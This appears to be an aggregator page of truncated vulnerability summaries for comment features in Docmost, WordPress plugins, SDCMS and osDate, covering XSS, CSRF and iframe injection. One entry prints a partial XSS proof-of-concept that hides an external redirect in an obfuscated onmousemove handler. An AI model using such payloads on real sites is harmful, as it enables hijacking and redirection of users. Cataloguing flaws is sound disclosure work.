CVE-2026-40927

Docmost is open-source collaborative wiki and documentation software. Prior to 0.80.0, when leaving a comment on a page, it is possible to include a JavaScript URI as the link. When a user clicks on the link the JavaScript executes. This vulnerability is fixed in 0.80.0...

WordPress Plugin Honeypot for WP Comment 安全漏洞

WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform developed in the PHP language. The platform supports personal blog sites on PHP and MySQL servers.WordPress plugin is an application plugin. A security vulnerability exists in WordPress...

CVE-2021-4227 Ark Comment Editor <= 2.15.6 - Iframe Injection via Comment

The ark-commenteditor WordPress plugin through 2.15.6 does not properly sanitise or encode the comments when in Source editor, allowing attackers to inject an iFrame in the page and thus load arbitrary content from any page to the comment section...

WordPress 插件跨站请求伪造漏洞

WordPress is the Wordpress Foundation's set of blogging platform developed using the PHP language. The platform supports the hosting of personal blog sites on PHP and MySQL servers. WordPress Plugin is a WordPress open source application plugin. cross-site request forgery vulnerability exists in...

WordPress plugin jQuery Reply to Comment 跨站脚本漏洞

WordPress and WordPress plugin are both products of the WordPress Foundation.WordPress is a blogging platform developed using the PHP language. The platform supports personal blog sites on PHP and MySQL servers.WordPress plugin is an application plugin. A cross-site scripting vulnerability exists...

CVE-2014-10382

The CVE-2014-10382 vulnerability affects the WordPress feature-comments plugin prior to version 1.2.5. It is a cross‑site request forgery (CSRF) flaw that allows an attacker to perform actions like featuring or burying comments by authenticated/unauthenticated users depending on the context descr...

SDCMS 1. 1sp1 the XSS vulnerability of the mining and use-vulnerability and early warning-the black bar safety net

SDCMS 1. 1sp1XSSthe vulnerability of the mining and use of SDCMS name: era website Information Management System. SDCMS is based on ASP+ACCESS/MSSQL website Information Management System. Permanently free, open source! SDCMS to information as the theme, through text and image title as a starting...

wordpress281 comments show xss vulnerability-vulnerability warning-the black bar safety net

Ghost boy’blog, XEYE’s blogto assist in testing. POC: the 1. In the comment URL field, fill in the 2. 3. http://blog.sohu.com/fh8e3333211134333/f8e9wjfidsj3332dfs’ onmousemove=’location. href=String. fromCharCode104,116,116,112,58,47,47,105,110,98,114,101,97,107,46,110,101,116,47,97,46,112,104,11...

CVE-2006-3767

The CVE-2006-3767 entry describes a Cross-site Scripting (XSS) vulnerability in Darren's osDate 1.1.7 and earlier (showprofile.php) that allows remote attackers to inject arbitrary script/HTML via the onerror attribute in an HTML IMG tag with a non-existent src, used when posting a comment (txtco...